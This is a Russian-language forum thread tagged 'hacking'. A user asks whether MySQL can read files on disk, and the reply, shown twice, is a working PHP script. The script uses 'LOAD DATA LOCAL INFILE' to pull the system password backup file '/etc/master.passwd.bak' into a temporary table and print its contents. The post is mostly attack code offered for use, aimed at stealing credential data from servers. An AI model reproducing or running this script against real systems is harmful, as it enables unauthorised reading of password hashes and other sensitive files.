 
Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
|
Yes 10.01.03 15:52 Число просмотров: 1262
Автор: choor Статус: Elderman
|
For Example:
<?
// config this data
$dbhost = "localhost";
$dbuser = "[dbuser]";
$dbpasswd = "[dbpass]";
$dbname = "[dbname]";
$file = "/etc/master.passwd.bak"; #имя файла для просмотра
// shell code
echo "";
mysql_connect ($dbhost, $dbuser,
$dbpasswd);
$sql = array (
"USE $dbname",
'CREATE TEMPORARY TABLE ' . ($tbl
= 'A'.time
()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$file' INTO
TABLE
$tbl FIELDS "
. "TERMINATED BY
_THIS_NEVER_HAPPENS_ "
. "ESCAPED BY '' "
. "LINES TERMINATED BY
_THIS_NEVER_HAPPENS_",
"SELECT a FROM $tbl LIMIT 1"
);
foreach ($sql as $statement) {
$query = mysql_query ($statement);
if ($query == false) die (
"FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n"
);
if (! $r = @mysql_fetch_array ($query,
MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result ($query);
}
echo "
---";
?>
---
|
|
<hacking>
|
Возможен ли доступ из MySQL к файлу на диске? 10.01.03 14:54
Автор: SP Статус: Незарегистрированный пользователь
|
|
sorry konechno esli ya chush' poriu, no vse-taki ...
|
|
Yes 10.01.03 15:52
Автор: choor Статус: Elderman
|
For Example:
<?
// config this data
$dbhost = "localhost";
$dbuser = "[dbuser]";
$dbpasswd = "[dbpass]";
$dbname = "[dbname]";
$file = "/etc/master.passwd.bak"; #имя файла для просмотра
// shell code
echo "";
mysql_connect ($dbhost, $dbuser,
$dbpasswd);
$sql = array (
"USE $dbname",
'CREATE TEMPORARY TABLE ' . ($tbl
= 'A'.time
()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$file' INTO
TABLE
$tbl FIELDS "
. "TERMINATED BY
_THIS_NEVER_HAPPENS_ "
. "ESCAPED BY '' "
. "LINES TERMINATED BY
_THIS_NEVER_HAPPENS_",
"SELECT a FROM $tbl LIMIT 1"
);
foreach ($sql as $statement) {
$query = mysql_query ($statement);
if ($query == false) die (
"FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n"
);
if (! $r = @mysql_fetch_array ($query,
MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result ($query);
}
echo "
---";
?>
---
|
|
|
подробно о проекте
Анализ криптографических сетевых...
